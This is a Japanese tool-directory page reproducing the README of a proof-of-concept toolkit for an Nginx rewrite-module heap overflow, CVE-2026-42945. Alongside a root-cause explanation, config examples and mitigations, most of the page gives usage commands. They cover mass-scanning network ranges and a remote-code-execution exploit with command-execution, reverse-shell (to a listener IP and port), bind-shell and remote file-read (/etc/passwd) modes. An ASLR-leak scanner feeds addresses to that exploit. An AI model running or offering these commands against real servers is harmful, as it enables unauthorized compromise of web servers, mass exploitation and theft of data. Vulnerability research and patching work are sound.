Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-42945 — CVE-2026-42945 Nginx Rift | Kitploit
ツール/GitHubGitHub/liaoziqi-gzfls/cve-2026-42945
偵察脆弱性分析エクスプロイト情報収集ウェブセキュリティファジングペネトレーションテストペイロード開発バイナリエクスプロイト
GitHubliaoziqi-gzfls/cve-2026-42945

CVE-2026-42945

CVE-2026-42945 Nginx Rift

1163ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2026-42945 Nginx Rift - PoC ツールキット

CVE-2026-42945(Nginx Rift)向けの包括的な概念実証(PoC)ツールキットです。Nginx の ngx_http_rewrite_module に存在する深刻なヒープバッファオーバーフロー脆弱性です。


脆弱性の概要

項目詳細
CVE IDCVE-2026-42945
名称Nginx Rift
タイプヒープバッファオーバーフロー
コンポーネントngx_http_rewrite_module
深刻度緊急(CVSS 9.2)
影響を受けるバージョンNginx 0.6.27 - 1.30.0
修正バージョンNginx 1.30.1 / 1.31.0

根本原因

この脆弱性は、rewrite ルールを処理する際の 2 回の内部パス間でのサイズ計算の誤りに起因します。設定で以下の条件を使用している場合:

  • 名前のない正規表現キャプチャ($1、$2 など)
  • ? を含む置換文字列との組み合わせ

Nginx は最初のパスで必要なバッファサイズを誤って計算し、2 番目のパスで割り当てられたヒープバッファの範囲を超えて書き込みを行います。

脆弱な設定例

server {
    # VULNERABLE: Unnamed capture ($1) + '?' in replacement
    location /api/ {
        rewrite ^/api/(.*)$ /v1/$1?version=2 last;
    }
}

安全な設定例(パッチ適用済み)

server {
    # SAFE: Named capture (?P<path>) replaces $1
    location /api/ {
        rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;
    }
}

ツールキットのコンポーネント

1. nginx_rift_poc.py - コア PoC ツール

単一ターゲットを対象とする脆弱性スキャナおよびエクスプロイトツールです。

機能:

  • Server ヘッダーから Nginx のバージョンを検出
  • バージョンが脆弱な範囲内かどうかを確認
  • ヒープオーバーフローを引き起こすように細工された HTTP ペイロードを送信
  • 脆弱/安全なテスト設定を生成

使用法:

# Detect version and test vulnerability
python nginx_rift_poc.py -t target.example.com

# Test with custom payload
python nginx_rift_poc.py -t target.example.com -p "/api/AAAA...?x=1"

# HTTPS target
python nginx_rift_poc.py -t target.example.com --ssl -p 443

# Generate vulnerable test configuration
python nginx_rift_poc.py --gen-vuln-config > vuln.conf

# Generate safe (patched) configuration
python nginx_rift_poc.py --gen-safe-config > safe.conf

2. nginx_rift_scanner.py - バッチスキャナ

複数のターゲットを同時にテストするためのバッチスキャナです。

機能:

  • マルチスレッドスキャン(デフォルト 50 スレッド)
  • ファイルまたは CIDR ネットワーク範囲からターゲットリストを読み込み
  • 連携のための JSON 出力
  • ポート 443 の SSL を自動検出

使用法:

# Scan from target file (format: host:port per line)
python nginx_rift_scanner.py -f targets.txt -o results.json

# Scan single target
python nginx_rift_scanner.py -t example.com -p 443 --ssl

# Scan network range
python nginx_rift_scanner.py -t 192.168.1.0/24 -p 80,443,8080

# High-speed scan
python nginx_rift_scanner.py -f targets.txt --threads 100 -o results.json

ターゲットファイルの形式:

# Comments start with #
192.168.1.1:80
192.168.1.2:443:ssl
example.com:8080

3. config_checker.py - 設定アナライザ

ローカルの Nginx 設定ファイルをスキャンして、脆弱な rewrite パターンを検出します。

機能:

  • nginx.conf を解析し、include ディレクティブを追跡
  • 置換文字列に ? を含む名前なしキャプチャを検出
  • 自動修正のサポート(バックアップ付き)
  • ディレクトリの再帰スキャン

使用法:

# Scan single file
python config_checker.py /etc/nginx/nginx.conf

# Scan directory recursively
python config_checker.py -d /etc/nginx/conf.d/

# Auto-fix vulnerable patterns (creates .bak backup)
python config_checker.py --fix /etc/nginx/nginx.conf

# Auto-detect common Nginx paths
python config_checker.py

4. enhanced_poc.py - 拡張 RCE PoC

depthfirst の公式研究に基づく高度なエクスプロイトツールで、複数の rewrite パターンとエクスプロイトモードをサポートしています。

機能:

  • 8 種類の一般的な脆弱 rewrite パターン(/api/、/redirect/、/user/ など)を自動検出
  • 複数のオーバーフロー発火文字(+、&、=、%)をサポート
  • オーバーフローサイズを制御したスマートなペイロード生成
  • 複数のエクスプロイトモード:cmd / shell / bind / read
  • ASLR 無効環境向けのカスタムヒープ/libc ベースアドレス
  • フェイク ngx_pool_cleanup_s を使用した動的なスプレー本体の構築

使用法:

# Auto-detect patterns and version
python enhanced_poc.py -t target.example.com --detect

# Execute command (ASLR off)
python enhanced_poc.py -t target.example.com --cmd "id > /tmp/pwned"

# Reverse shell
python enhanced_poc.py -t target.example.com --shell --listen-ip 10.0.0.1 --listen-port 4444

# Bind shell
python enhanced_poc.py -t target.example.com --bind --listen-port 5555

# Read remote file
python enhanced_poc.py -t target.example.com --read /etc/passwd

# Custom heap base (for ASLR-off targets)
python enhanced_poc.py -t target.example.com --cmd "whoami" --heap-base 0x555555554000

# Use & as overflow trigger
python enhanced_poc.py -t target.example.com --cmd "id" --escape-char "&"

エクスプロイトモードの詳細:

モード説明出力
cmd単一のシェルコマンドを実行ターゲット上のコマンド出力
shellリバースシェルを起動--listen-ip:listen-port に接続を戻す
bindターゲット上でバインドシェルを起動ターゲット上の --listen-port で待ち受け
readターゲットからファイルを読み取る内容は /tmp/nginx_rift_read に書き込まれる

アドレス設定(ASLR 無効時のみ):

  • --heap-base: ターゲットのヒープベースアドレス(例:0x555555559000)
  • --libc-base: libc のベースアドレス(例:0x7ffff77ba000)
  • --system-addr: system() の直接アドレス(libc-base を上書き)

5. aslr_leak_detector.py - ASLR リーク検出器

ASLR 保護をバイパスできる情報漏えいを検出するための総合スキャナです。

機能:

  • HTTP ヘッダー漏えい検出(Server、X-Powered-By など)
  • メモリアドレスとスタックトレースのエラーページ分析
  • Nginx 固有エンドポイントの探索(/nginx_status、/actuator/* など)
  • メモリアドレス漏えい検出(64 ビットポインタ、ヒープ/libc/スタックアドレス)
  • タイミング分析によるヒープレイアウトの探索
  • ASLR ステータスの推測(有効/無効/弱)
  • JSON レポートによる enhanced_poc.py との直接連携

使用法:

# Scan single target
python aslr_leak_detector.py -t target.example.com

# Scan with SSL
python aslr_leak_detector.py -t target.example.com -p 443 --ssl

# Scan from file, save report
python aslr_leak_detector.py -f targets.txt -p 80,443 -o leak_report.json

# Scan network range
python aslr_leak_detector.py -t 192.168.1.0/24 -p 80,443

# Quick scan mode
python aslr_leak_detector.py -t target.example.com --quick

拡張 PoC との連携:

# Step 1: Detect leaks
python aslr_leak_detector.py -t target.example.com -o leak.json

# Step 2: Use leaked addresses for exploit
python enhanced_poc.py -t target.example.com \
  --heap-base 0x555555559000 \
  --libc-base 0x7ffff77ba000 \
  --cmd "id"

脆弱性検出の指標

PoC ツールは、以下の指標を通じて脆弱性を識別します:

指標説明
接続の切断ターゲットが予期せず接続を閉じる(ワーカーのクラッシュ)
ゲートウェイエラーHTTP 502/503/504 応答(ワーカープロセスの停止)
応答の遅延応答時間が大幅に増加する(クラッシュからの復旧)
空の応答ベースラインと比較して応答ボディが消える
バージョンの一致検出された Nginx バージョンが脆弱な範囲内

インストール

外部依存関係は不要です。Python 標準ライブラリのみを使用します。

# Clone or download the toolkit
git clone <repository-url>
cd CVE-2026-42945

# Verify Python version (3.7+ recommended)
python3 --version

# Run any tool
python3 nginx_rift_poc.py --help

影響を受けるバージョン

製品影響を受けるバージョン修正バージョン
Nginx オープンソース版0.6.27 - 1.30.01.30.1 / 1.31.0
Nginx PlusR32 - R36R32 P6 / R36 P4
Nginx Ingress Controllerパッチ未適用の全バージョン修正済みリリースに更新
Nginx Gateway Fabricパッチ未適用の全バージョン修正済みリリースに更新

緩和策

緊急の対応

  1. Nginx をバージョン 1.30.1(安定版)または 1.31.0(メインライン版)にパッチ適用する
  2. 脆弱な rewrite パターンがないか設定を監査する
  3. Nginx ワーカープロセスを実行しているすべてのホストで ASLR を有効化する

設定による回避策

直ちにパッチを適用できない場合は、名前なしキャプチャを名前付きキャプチャに置き換えます:

# BEFORE (VULNERABLE)
rewrite ^/api/(.*)$ /v1/$1?version=2 last;

# AFTER (SAFE)
rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;

WAF 仮想パッチ

脆弱な rewrite パターンを標的とした不正なリクエストをブロックする WAF ルールを展開します。


免責事項

本ツールキットは、許可されたセキュリティテストおよび研究目的のみで使用してください。

  • 所有しているシステム、または明示的なテスト許可を得たシステムに対してのみ使用してください
  • コンピュータシステムへの不正アクセスは違法です
  • 著作者は、本ツールの誤用または本ツールによって引き起こされた損害について責任を負いません
  • 本番環境で使用する前に、必ず隔離された環境でテストしてください

関連する CVE

この欠陥は、他の 3 つのメモリ破壊の問題とともに発見されました:

ツールをダウンロード